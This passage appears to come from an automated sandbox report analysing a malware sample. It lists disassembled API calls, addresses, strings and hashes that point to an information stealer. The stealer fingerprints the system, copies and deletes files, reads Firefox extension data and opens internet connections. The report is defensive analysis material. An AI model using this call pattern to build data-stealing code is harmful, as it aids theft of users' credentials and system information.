                                                                                                                                                                                                                              • Part of subcall function 00415B4D: HeapAlloc.KERNEL32(00000000), ref: 00415B79
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: wsprintfA.USER32 ref: 00415B92
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: FindFirstFileA.KERNEL32(?,?), ref: 00415BA9
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: StrCmpCA.SHLWAPI(?,00436AA0), ref: 00415BCA
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: StrCmpCA.SHLWAPI(?,00436AA4), ref: 00415BE4
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: wsprintfA.USER32 ref: 00415C0B
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: CopyFileA.KERNEL32(?,?,00000001), ref: 00415CC8
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: DeleteFileA.KERNEL32(?), ref: 00415CEB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1546541418-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B19
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B20
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B4E
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B6A
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00436890,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID: Windows 11
                                                                                                                                                                                                                            • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B92
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B99
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410BB7
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00436890,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ), ref: 00410BD2
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00436890,?,?,?,00410BF0,00410B2D,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410BDB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                                            • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00411733
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,004118D6,?), ref: 00411756
                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00411763
                                                                                                                                                                                                                            • _wtoi64.MSVCRT ref: 00411796
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004117AF
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004117B6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 181426013-0
                                                                                                                                                                                                                            • Opcode ID: 94a9f91ccacc7efa5da4f735102b9eaf6ebfce10aa4b3815ebcfd38f894d266d
                                                                                                                                                                                                                            • Instruction ID: f8cdbbbe70d397e706f906296cdeba407d3bbd7863d046f8457389d6b98cb90c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94a9f91ccacc7efa5da4f735102b9eaf6ebfce10aa4b3815ebcfd38f894d266d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90114C74A0424ADFCF009FA4D8989EEBBB5AF49310F64417EF215E73A0DB394945CB68
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004010D0
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,0041850E), ref: 00401100
                                                                                                                                                                                                                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1859398019-0
                                                                                                                                                                                                                            • Opcode ID: 45a9583896774015c5220384c9ed5eb294c525cf6862c07f2340da09953674c4
                                                                                                                                                                                                                            • Instruction ID: 25c570db86decb207e4e4dfc09e078fb1bce2ee661320ecb4d87a6b80f7b96d5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a9583896774015c5220384c9ed5eb294c525cf6862c07f2340da09953674c4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0C87238122477F22412763C6EF6B1A6C9B41F56F205035F309FB2D0D6699804967C
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004116A3
                                                                                                                                                                                                                              • Part of subcall function 004123AA: malloc.MSVCRT ref: 004123AF
                                                                                                                                                                                                                              • Part of subcall function 004123AA: strncpy.MSVCRT ref: 004123C0
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8
                                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                            • String ID: Unknown
                                                                                                                                                                                                                            • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                            • Opcode ID: f644913eff35c1bea0ebd6b3338a588dfdbe38cf0212d1c473d842671d84e224
                                                                                                                                                                                                                            • Instruction ID: bbe101daec5a89a31c14a1391deaf042981834e050b350a90ece11c042c44c38
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f644913eff35c1bea0ebd6b3338a588dfdbe38cf0212d1c473d842671d84e224
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E113675A0021CABDB11EB65DC85BDD73B8AB08704F4004AAB645F7191DA78AEC88F5C
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 00411106
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041110D
                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411129
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041114F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                            • String ID: %d MB
                                                                                                                                                                                                                            • API String ID: 3644086013-2651807785
                                                                                                                                                                                                                            • Opcode ID: 72a52e70201ad22aec00983051af57702ef65c70131e266f08feed65ab004bf9
                                                                                                                                                                                                                            • Instruction ID: b03481c602d06677a198dbb5353ea4b7396302b30250a932e355f2735c5afa91
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72a52e70201ad22aec00983051af57702ef65c70131e266f08feed65ab004bf9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F301AEB1E00318ABEB04DFB4DC45AFEB7B8EF08705F44006AF601D7190DA759D818765
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CC33,?,0041CCC1,00000000,06400000,00000003,00000000,004175C1,.exe,00436C64), ref: 0041BCB3
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CC33,?,0041CCC1,00000000,06400000,00000003,00000000), ref: 0041BCEB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CreatePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2024441833-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$Heap$AllocateConnectCrackOpenProcesslstrcpylstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4264985986-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1274457161-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934), ref: 00410F3A
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F41
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ), ref: 00410F5F
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000), ref: 00410F7B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F84
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(0065EF20,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DADF), ref: 004083F7
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(?,00437194,0065EF20,0043674E,?,?,?,?,?,?,?,?,0040DADF), ref: 0040844C
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DADF), ref: 00408460
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                            • String ID: e
                                                                                                                                                                                                                            • API String ID: 2929475105-726562168
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00416E0F
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,0000001C), ref: 00416E1A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E9E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                            • String ID: ERROR
                                                                                                                                                                                                                            • API String ID: 591506033-2861137601
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,*>A,00000000,?), ref: 00412241
                                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041225C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412263
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                            • String ID: *>A
                                                                                                                                                                                                                            • API String ID: 3183270410-2324000863
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3AC
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B4FE
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040B519
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040B56B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 211194620-0
                                                                                                                                                                                                                            • Opcode ID: 910fb197984527cdcfe17cc5d9ccb522993ee5dffb8f6abadc46a924ae042fc9
                                                                                                                                                                                                                            • Instruction ID: 3ec7e8d459c17c4ba2b3cc53c57d202e631d8954fb6531d8ac8215f7adabc5be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 910fb197984527cdcfe17cc5d9ccb522993ee5dffb8f6abadc46a924ae042fc9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48715E72A00119ABCF01FFA5ED469CD7775EF04309F11503AF500B71A2DBB8AE898B98
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,?,00437530,0043687B), ref: 0040D474
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040D487
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                            • API String ID: 161838763-3310892237
